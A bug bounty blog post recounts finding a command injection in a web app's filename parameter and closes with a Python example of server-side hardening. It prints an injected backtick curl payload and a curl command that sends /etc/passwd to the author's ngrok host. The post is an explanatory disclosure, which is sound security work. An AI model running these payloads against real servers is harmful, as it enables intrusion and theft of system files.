InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

When Life Throws Errors, I Throw Commands: My Command Injection Bug🤓

Iski
Published in InfoSec Write-ups
2 min read · Mar 11, 2025

Hey there! 👋

I wake up every day hoping to fix my life, but instead, I end up fixing someone else’s web app vulnerabilities. 😅

After a tragic attempt at making breakfast, here's how my boring day turned into a hacking rollercoaster! 🎢

🕵️ The Discovery: Filename or Commandline?

I was casually testing a web app when I stumbled upon a parameter named filename. Out of curiosity (and because I had nothing better to do), I entered this:

filename=burp.com

Guess what? I received an SMTP request from my Burp Collaborator server! 💥

At that moment, my brain went:

“Hold on… is this thing vulnerable to Command Injection?!”

Spoiler alert: It was.

  • “I can’t control my life, but I can control servers with curl.”

🔑 The Exploitation: Curling My Way to Victory

I quickly spun up an ngrok server to catch outgoing requests:

./ngrok http 80

Then, I tried injecting a curl command into the vulnerable parameter:

filename=`curl bowbowbow.ngrok.io`

Boom! I got a request on my ngrok server. It was game on from that moment.

📂 Dumping /etc/passwd (The Hacker’s Rite of Passage)

Feeling like a cyber ninja, I went one step further. I tried to see if I could grab system files, and this command did the trick:

curl -F shl=@/etc/passwd bowbowbow.ngrok.io

Seconds later, the /etc/passwd file landed on my ngrok server. At that point, I just stared at my terminal, grinning like a maniac. 😈

Lesson of the day: A single parameter can make or break an entire system.
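As an added example (not code from this post; the target's stack is unknown), here is the Python pattern that removes this bug class on the server side: the filename parameter is allow-listed and then passed to the external tool as a single argv element with shell=False, so backticks, $(...) and friends are never interpreted. Note that a value like burp.com is a perfectly legitimate filename; the fix is not to guess at hostnames but to never hand the value to a shell. The `file` command, the /srv/uploads directory and all function names are assumptions.

```python
import re
import subprocess
from typing import List

# Added example, not the write-up's code. Hardened handling of a "filename"
# request parameter that must reach a system command.

# Allow-list: bare names such as "report.pdf". No slashes, no leading dot, and
# none of the shell metacharacters (` $ ; | & < > ( ) quotes, whitespace).
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")
SHELL_META = set("`$;|&<>()\\\"' \t\n")


class BadFilename(ValueError):
    """Raised when a filename parameter fails validation."""


def suspicious_chars(value: str) -> str:
    """Return the shell metacharacters present in value (sorted), for logging/alerting."""
    return "".join(sorted(set(value) & SHELL_META))


def validate_filename(value: str) -> str:
    """Return value unchanged if it is a safe bare filename, otherwise raise."""
    if not SAFE_NAME.fullmatch(value):
        meta = suspicious_chars(value)
        detail = f"shell metacharacters {meta!r}" if meta else "disallowed format"
        raise BadFilename(f"rejected filename {value!r}: {detail}")
    return value


def build_argv(filename: str, upload_dir: str = "/srv/uploads") -> List[str]:
    """Build the argument vector for a hypothetical 'file' check on an upload.

    The command is an argv list, not a string: nothing is parsed by /bin/sh,
    and the literal '--' stops the name from being read as an option.
    """
    name = validate_filename(filename)
    return ["file", "--", f"{upload_dir}/{name}"]


def inspect_upload(filename: str) -> str:
    """Run the tool without a shell; shell=False means no command substitution."""
    result = subprocess.run(build_argv(filename), shell=False,
                            capture_output=True, text=True, timeout=5)
    return result.stdout
```

Rejections from validate_filename carry the offending metacharacters, which makes the exception message a useful signal to log and alert on.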

Written by Iski

Cybersecurity Researcher | Penetration Tester | Bug Bounty Hunter | Web security| Passionate about cyber security, security automation
